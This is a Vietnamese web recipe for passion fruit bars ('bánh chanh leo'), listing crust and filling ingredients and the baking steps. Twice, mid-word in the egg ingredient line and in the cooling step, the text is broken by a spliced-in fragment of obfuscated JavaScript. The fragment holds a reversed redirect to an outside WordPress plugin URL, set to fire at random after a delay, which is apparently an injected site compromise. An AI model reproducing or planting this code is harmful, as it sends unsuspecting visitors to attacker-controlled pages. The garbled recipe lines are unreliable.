Cách làm bánh chanh leo cực “chất”

Bánh chanh leo làm không hề khó, rất hợp để ăn trong mùa hè do vị chua, mát lạnh mà rất thơm.
Nguyên liệu:
Phần đế bánh:
295g bột mỳ
75g đường
230g bơ
Một nhúm muối
Phần nhân bánh:
6 quả trứng gà công nghiệp loại càng toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to càng tốt
400g đường
55g bột mỳ
7g bột nở
150ml nước cốt chanh leo

Cách làm:
Để làm phần đế bánh, bạn trộn đều bột mỳ, đường, muối trong một tô trộn. Thêm bơ và dùng cái cắt bơ để dằm đều bơ vào phần bột. Nếu không có cái cắt bơ chuyên dụng bạn có thể dùng tay bóp đều bơ trong hỗn hợp bột – đường.
Nén phần đế bánh này vào khuôn nướng. Để lấy bánh ra được dễ dàng khi bánh chín bạn nên phết một lớp bơ mỏng hoặc một lớp dầu ăn lên khuôn trước khi nén phần đế bánh vào khuôn nhé.
Nướng đế bánh trong lò ở nhiệt độ 175ºC trong khoảng 15 – 20 phút hoặc đến khi vàng mặt.
Trong khi nướng phần đế bánh, bạn chuẩn bị phần nhân bánh.
Đập 6 quả trứng vào một tô trộn khác: Đánh trứng cho tới khi nổi bọt (nhưng không quá nhiều bọt bạn nhé) thì từ từ thêm đường vào: Thêm bột mỳ, bột nở và trộn đều: Đổ nước cốt chanh leo vào và trộn đến khi bạn có được hỗn hợp sánh mịn.
Đổ hỗn hợp này lên phần đế bánh đã nướng, tiếp tục cho vào lò và nướng với nhiệt độ 160ºC trong khoảng 30 – 35 phút hoặc phần mặt bánh chuyển màu nâu vàng và bên trong phần nhân bánh cứng lại.
Đợi cho bánh nguội hoàn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} toàn, bạn cất bánh vào ngăn mát tủ lạnh vài giờ trước khi dùng nhé.
Cắt bánh thành từng miếng chữ nhật: Rắc đường bột lên trên ăn rất ngon đấy!